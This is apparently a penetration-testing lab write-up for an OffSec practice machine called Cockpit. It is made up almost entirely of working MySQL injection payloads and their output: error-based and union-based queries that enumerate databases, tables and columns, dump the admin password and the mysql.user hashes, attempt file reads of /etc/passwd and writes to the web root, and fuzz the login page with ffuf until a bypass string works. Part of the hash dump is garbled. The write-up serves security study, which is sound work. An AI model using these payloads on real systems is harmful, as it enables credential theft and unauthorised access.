SQL Injection

The discovered login page appears to be vulnerable to SQL injection as sending a single quote character, ', to the username parameter resulted in SQL error. Based on the error message alone, the backend appears to be MySQL.

Error-based In-band

' AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- // Using UPDATEXML method. The version is 8.0.41

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT database()),'~')) -- // Using the EXTRACTVALUE method. The current database is blazeDB

' AND GTID_SUBSET(CONCAT('~',(SELECT current_user()),'~'),1337) -- // Using the GTID_SUBSET method. The current user is admin@localhost

Databases (Error-based In-band)

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata),'~')) -- // A single row is expected

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1),'~')) -- // Using LIMIT to set the amount of row returned. 1 in this case. It’s the first one from the top There is a DB, mysql

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 1),'~')) -- // Using OFFSET to change the row There is the default information_schema DB

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 2),'~')) -- // Using OFFSET to change the row There is the default performance_schema DB

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 3),'~')) -- // Using OFFSET to change the row There is the default sys DB

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 4),'~')) -- // Using OFFSET to change the row There is the current blazeDB DB

`blazeDB` Table (Error-based In-band)

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT table_name FROM information_schema.tables WHERE table_schema="blazeDB" LIMIT 1 OFFSET 0),'~')) -- // The sole blazeDB.users table discovered

`blazeDB.users` Columns (Error-based In-band)

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 0),'~')) -- // The blazeDB.users.id column found

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 1),'~')) -- // The blazeDB.users.name column found

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 2),'~')) -- // The blazeDB.users.password column found

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 3),'~')) -- // The blazeDB.users.phone-number column found

' AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT column_name FROM information_schema.columns WHERE table_schema="blazeDB" AND table_name='users' LIMIT 1 OFFSET 4),'~')) -- // The blazeDB.users.username column found

`blazeDB.users` Credential Exfiltration (Error-based In-band)

' AND GTID_SUBSET(CONCAT('~',(SELECT password FROM blazeDB.users WHERE username='admin' LIMIT 1 OFFSET 0),'~'),1337) -- // Password exfiltrated for the admin user; canttouchhhthiss@455152

`mysql.user` Credential Exfiltration (Error-based In-band)

' AND GTID_SUBSET(CONCAT('~',(SELECT user FROM mysql.user LIMIT 1 OFFSET 0),'~'),1337) -- // admin user

' AND GTID_SUBSET(CONCAT('~',(SELECT password FROM mysql.user WHERE user='admin'),'~'),1337) -- // canttouchhhthiss@455152 is the password. Same as the web credential

' AND GTID_SUBSET(CONCAT('~',(SELECT user FROM mysql.user LIMIT 1 OFFSET 5),'~'),1337) -- // The default root account

' AND GTID_SUBSET(CONCAT('~',(SELECT password FROM mysql.user WHERE user='root'),'~'),1337) -- // canttouchhhthiss@455152 is the password. Same as the web credential and that of the admin user Additionally, it leaked the web root directory; /var/www/blaze.offsec

Read Access (Error-based In-band)

' AND GTID_SUBSET(CONCAT('~',(SELECT LOAD_FILE('/etc/passwd')),'~'),1337) -- // No output Likely access denied

Union-based In-band

' UNION SELECT NULL,NULL,NULL,NULL,NULL -- // There are 5 columns as enumerated above

' UNION SELECT NULL,@@version,NULL,NULL,NULL -- // It’s the 2nd column that is visible The version is 8.0.41-0ubuntu0.20.04.1

' UNION SELECT NULL,user(),NULL,NULL,NULL -- // The current user is admin@localhost

' UNION SELECT NULL,database(),NULL,NULL,NULL -- // The current DB is blazeDB

Databases (Union-based In-band)

' UNION SELECT NULL,schema_name,NULL,NULL,NULL FROM information_schema.schemata-- // 5 DBs;

mysql
information_schema
performance_schema
sys
blazeDB

`blazeDB` Table (Union-based In-band)

' UNION SELECT NULL,table_name,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema="blazeDB" -- // The sole blazeDB.users table discovered

`blazeDB.users` Columns (Union-based In-band)

' UNION SELECT NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_schema='blazeDB' AND table_name='users' -- // 5 Columns

blazeDB.users.id
blazeDB.users.name
blazeDB.users.password
blazeDB.users.phone-number
blazeDB.users.username

`blazeDB.users` Credential Exfiltration (Union-based In-band)

' UNION SELECT NULL,GROUP_CONCAT(username,':',password),NULL,NULL,NULL FROM blazeDB.users -- // Credential exfiltrated; admin:canttouchhhthiss@455152

`mysql.user` Credential Exfiltration (Union-based In-band)

' UNION SELECT NULL,GROUP_CONCAT(user,':',authentication_string),NULL,NULL,NULL FROM mysql.user -- // Credential exfiltrated; admin:$A$005$Qg/"*JPs!rrkudEg,JuvICGCXAsSpnRB83RwsEHL7G/XKu8Mlg7pkbGc/0PB debian-sys-maint: $A$ 005 $]SW<Ixv#ZK[@TBcaGf6Oko5CBq1m15xfVMg9n1oodw45BFgV7epnhBL5` `mysql.infoschema:$ A $005$ THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED mysql.session: $A$ 005 $T H I S I S A COMB I N A T I ONOF I N V A L I D S A L T A N D P A SS W OR D T H A TM U STNE V ERBRBE U SE D ‘‘ m ys ql . sys :$ A $005$ THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED root:`

Unfortunately, some characters could not be rendered

Read Access (Union-based In-band)

' UNION SELECT NULL,LOAD_FILE('/etc/passwd'),NULL,NULL,NULL -- // No output Likely access denied

Write Access (Union-based In-band)

' UNION SELECT NULL,"test",NULL,NULL,NULL INTO OUTFILE "/var/www/blaze.offsec/test.txt"-- //&password= Access denied

Word, sleep, is a blacklisted word. Redirecting user to the blocked page

benchmark seems to be blocked as well N/A

Automated

Time-based Attack succeeded but broke the web app, so not viable

Authentication Bypass

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/cockpit]
└─$ ffuf -X POST -c -w /usr/share/wordlists/seclists/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt -u http://$IP/login.php -H 'Content-Type: application/x-www-form-urlencoded'  -d 'username=FUZZ&password=qwe' -ic -mc all 
________________________________________________
 :: Method           : POST
 :: URL              : http://192.168.152.10/login.php
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=FUZZ&password=qwe
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
________________________________________________
'OR 1=1--               [Status: 200, Size: 806, Words: 81, Lines: 16, Duration: 23ms]
'OR '' = '      Allows authentication without a valid username. [Status: 302, Size: 769, Words: 69, Lines: 29, Duration: 23ms]
<username>'--           [Status: 200, Size: 808, Words: 81, Lines: 16, Duration: 24ms]
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1-- [Status: 200, Size: 809, Words: 81, Lines: 16, Duration: 24ms]
<username>' OR 1=1--    [Status: 302, Size: 632, Words: 48, Lines: 16, Duration: 25ms]
:: Progress: [5/5] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

'OR '' = ' works

InfoSec LAB

Explorer

Cockpit_SQLi

SQL Injection